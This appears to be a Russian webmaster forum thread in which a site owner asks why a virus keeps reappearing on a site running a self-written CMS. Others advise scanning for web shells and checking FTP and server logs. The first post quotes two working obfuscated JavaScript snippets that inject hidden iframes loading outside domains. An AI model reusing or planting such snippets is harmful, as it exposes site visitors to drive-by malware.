Каждый месяц новый вирус? Help

12 3
ilux
На сайте с 11.07.2009
Offline
371
2013

Каждый месяц на сайте появляется вирус такого типа

<script language=JavaScript>jhtm='%3Ciframe%20src%3D%22http%

3A//123statistik.ru/stat/go2.php%3Fsite%3D5%22%20width%3D1%2

0height%3D1%20style%3D%22visibility%3A%20hidden%22%3E%3C/ifr

ame%3E';crypo=unescape(jhtm);document.write(crypo);</script>

или

<script language=JavaScript>jhtm='%3Ciframe%20src%3D%22http%

3A//zxcv7.in/stat/%3F3%22%20width%3D2%20height%3D2%20style%3

D%22visibility%3A%20hidden%22%3E%3C/iframe%3E';crypo=unescap

e(jhtm);document.write(crypo);</script>

:no:

Это случилось уже 5 раз за год

1 ) Менял Фтп пароли каждый раз как удалял

2 ) Проверял антивирусом постоянно компьютер на котором Ftp zilla

3 ) Последний раз вообще удалил , поменял пароль и вообще не пользовался ФТП ( Т.е через комп он значит точно не проникает )

4 ) Хостинг Sweb - вроде тоже не левый.

5 ) Единственное - это самописный CMS .

Подскажите где искать ошибку , и как предотвратить его ?

🎄 Мой блог и тест пуш партнерок в реальном времени -> https://t.me/seo2007
infin1ty
На сайте с 03.06.2009
Offline
169
#1

Слабо просканировать сайт на наличие шеллов?

Ну и если у вас самопис, то придётся очень туго. Дырка есть, а искать её кто-то будет только за хорошие $.

[Удален]
#2

Ссылку на сайт мне в л.с скиньте

E3
На сайте с 20.12.2010
Offline
18
#3
infin1ty:
Ну и если у вас самопис, то придётся очень туго. Дырка есть, а искать её кто-то будет только за хорошие $.

В рот компот , а логи сервера на кой придумали ?

ext3 добавил 31.01.2011 в 20:26

ilux,

епипетская сила , либо шелл , либо sql

Хотя с меньшей долей вероятности , ломают ваш хостинг. Профи . тогда полный болт на вычислить , вам , в данном контексте.

S
На сайте с 07.11.2008
Offline
152
#4

Для начала запросите у хостера логи доступа к ftp за то время, когда появился вирус.

ilux
На сайте с 11.07.2009
Offline
371
#5
Слабо просканировать сайт на наличие шеллов?

Это как?

Для начала запросите у хостера логи доступа к ftp за то время, когда появился вирус.

Okay спасибо

Ссылку на сайт мне в л.с скиньте

Кинул

R
На сайте с 24.01.2008
Offline
180
#6

Если есть проблемы попробуем решить, стучите

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
ilux
На сайте с 11.07.2009
Offline
371
#7

Запросил логи и получил

xfirelog не показал никаких изменений кроме как моих

А syslog показал два захода в день перед заражением с немоего ip

Что следует из этого ?

S
На сайте с 07.11.2008
Offline
152
#8
ilux:
Запросил логи и получил

xfirelog не показал никаких изменений кроме как моих

А syslog показал два захода в день перед заражением с немоего ip

Что следует из этого ?

Зашли два раза и что сделали?

ilux
На сайте с 11.07.2009
Offline
371
#9

Вот что написано

3.gz:Jan 29 14:50:19 pretoria ftp-proxy[27481]: USER-INF 'USER foodmag' from 46.73.204.226

/var/log/syslog.3.gz:Jan 29 14:50:19 pretoria ftp-proxy[27481]: USER-INF reading data for 'foodmag' from cfg-file

/var/log/syslog.3.gz:Jan 29 14:50:23 pretoria ftp-proxy[27593]: USER-INF 'USER foodmag' from 46.73.204.226

/var/log/syslog.3.gz:Jan 29 14:50:23 pretoria ftp-proxy[27593]: USER-INF reading data for 'foodmag' from cfg-file

Сегодня опять появился этот скрипт ! Да чтож такое..

S
На сайте с 07.11.2008
Offline
152
#10

Скрипт в каком файле прописывается?

Что в access логе FTP?

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий